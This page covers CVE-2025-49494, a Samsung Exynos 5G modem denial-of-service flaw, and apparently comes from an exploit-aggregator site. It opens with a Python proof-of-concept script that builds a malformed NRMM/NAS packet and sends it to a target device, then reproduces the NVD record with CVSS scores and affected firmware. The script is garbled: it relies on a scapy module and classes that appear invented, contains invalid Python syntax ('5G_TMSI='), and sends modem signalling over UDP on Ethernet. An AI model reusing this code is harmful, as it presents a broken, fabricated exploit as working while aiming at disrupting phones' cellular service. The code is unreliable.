CVE-2025-49494

# CVE-2025-49494 PoC - 5G NRMM Malformed Packet DoS # This PoC demonstrates sending a malformed NRMM message to trigger the vulnerability # Requires: Python 3.8+, scapy, numpy, scipy from scapy.all import * from scapy.contrib.etsi5g import * import struct def create_malformed_nrmm_pdu(): """ Create a malformed 5G NRMM message that triggers the vulnerability. The vulnerability exists in NRMM packet handling where length fields are not properly validated before processing. """ # Create NRMM header with invalid length field nrmm_pdu = bytes([ 0x00, 0x01, # Message Type: Registration Request 0x00, 0x00, 0x00, 0x00, # 5GMM Cause (invalid) 0x00, 0xFF, # MALFORMED: Invalid TLV length (exceeds packet size) ]) # Add additional malformed TLVs to trigger parsing error nrmm_pdu += bytes([0x10, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00]) return nrmm_pdu def send_malformed_packet(target_mac, target_ip, interface='eth0'): """ Send malformed NRMM packet to target device. Args: target_mac: MAC address of the target device target_ip: IP address of the target (usually in cellular network range) interface: Network interface to use """ malformed_data = create_malformed_nrmm_pdu() # Create packet with custom NRMM payload pkt = Ether(dst=target_mac)/IP(dst=target_ip)/UDP(sport=38412, dport=38412)/malformed_data print(f"[*] Sending malformed NRMM packet ({len(malformed_data)} bytes)") print(f"[*] Target: {target_ip}") sendp(pkt, iface=interface, verbose=1) print("[+] Packet sent successfully") def create_etsi5g_nrmm_exploit(): """ Alternative: Create ETSI 5G NAS message with malformed MM parameters. Uses scapy's ETSI 5G module for proper protocol structure. """ # Create 5GMM registration request with invalid IE nas_msg = NAS5GMessage( protocol_discriminator=0x7E, message_type=0x41, # Registration Request ) # Add malformed Information Elements ie_list = [ # Invalid 5G GUTI with wrong length IE5G_GUTI(mcc='001', mnc='01', amf_region_id=0x01, amf_set_id=0x001, amf_pointer=0x01, 5G_TMSI=0x12345678), ] return bytes(nas_msg) + bytes(IE5G_MM_Cause(cause=0x00)) + bytes([0xFF, 0x00, 0x00]) if __name__ == "__main__": print("=" * 60) print("CVE-2025-49494 PoC - Samsung Exynos 5G NRMM DoS") print("=" * 60) print("[!] This PoC is for educational and security research purposes only") print("[!] Unauthorized use against systems you don't own is illegal") print() # Configuration - modify these for your test environment TARGET_MAC = "aa:bb:cc:dd:ee:ff" # Target device MAC TARGET_IP = "192.168.1.100" # Target IP in cellular network INTERFACE = "eth0" # Network interface try: send_malformed_packet(TARGET_MAC, TARGET_IP, INTERFACE) except Exception as e: print(f"[-] Error: {e}") print("[*] Note: Requires root privileges and proper network access")

{"cve": {"id": "CVE-2025-49494", "sourceIdentifier": "[email protected]", "published": "2025-11-04T20:17:15.930", "lastModified": "2025-11-07T12:57:14.400", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "An issue was discovered in Samsung Mobile Processor, Wearable Processor, and Modem Exynos 2100, 1280, 2200, 1330, 1380, 1480, 9110, Modem 5123. Mishandling of an 5G NRMM packet leads to a Denial of Service."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-400"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:samsung:modem_5123_firmware:-:*:*:*:*:*:*:*", "matchCriteriaId": "045EF1AD-09AE-4A33-9CB0-E30548BF5324"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:samsung:modem_5123:-:*:*:*:*:*:*:*", "matchCriteriaId": "65A314B5-05AD-4F3D-8371-DFDF3778A743"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:samsung:exynos_1280_firmware:-:*:*:*:*:*:*:*", "matchCriteriaId": "BD1A7B09-9031-4E54-A24F-3237C054166B"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:samsung:exynos_1280:-:*:*:*:*:*:*:*", "matchCriteriaId": "DFC68046-2F08-40D1-B158-89D8D9263541"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:samsung:exynos_1380_firmware:-:*:*:*:*:*:*:*", "matchCriteriaId": "D381478B-C638-4663-BD71-144BE4B02E46"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:samsung:exynos_1380:-:*:*:*:*:*:*:*", "matchCriteriaId": "61E72146-72FE-4B54-AB79-3C665E7F016C"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:samsung:exynos_1330_firmware:-:*:*:*:*:*:*:*", "matchCriteriaId": "C2635646-DD6A-4735-8E01-F45445584832"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:samsung:exynos_1330:-:*:*:*:*:*:*:*", "matchCriteriaId": "AA0F8A58-71B7-4503-A03A-6FB4282D75BD"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:samsung:exynos_1480_firmware:-:*:*:*:*:*:*:*", "matchCriteriaId": "64897B0D-EBF6-4BEB-BF54-ABCDBFAB45E0"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:samsung:exynos_1480:-:*:*:*:*:*:*:*", "matchCriteriaId": "F3F328B4-0442-4748-B5EE-DD1CEE50D6CF"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:samsung:exynos_2100_firmware:-:*:*:*:*:*:*:*", "matchCriteriaId": "89B88BFE-3C82-498C-8EC1-5784836DB1A1"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:samsung:exynos_2100:-:*:*:*:*:*:*:*", "matchCriteriaId": "9385885D-654A-496E-8029-7C6D9B077193"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:samsung:exynos_9110_firmware:-:*:*:*:*:*:*:*", "matchCriteriaId": "F1896BFF-D709-481B-AD4F-37D1A8B30C06"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:samsung:exynos_9110:-:*:*:*:*:*:*:*", "matchCriteriaId": "E6748EF2-3C63-41CD-B3D1-4B3FEC614B40"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:samsung:exynos_2200_firmware:-:*:*:*:*:*:*:*", "matchCriteriaId": "63C0D9AC-BD23-48C9-83E7-301DEC06E583"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:samsung:exynos_2200:-:*:*:*:*:*:*:*", "matchCriteriaId": "A72ADEBB-ED72-4A5B-BB27-95EDE43F8116"}]}]}], "references": [{"url": "https://semiconductor.samsung.com/support/quality-support/product-security-updates/", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://semiconductor.samsung.com/support/quality-support/product-security-updates/cve-2025-49494/", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}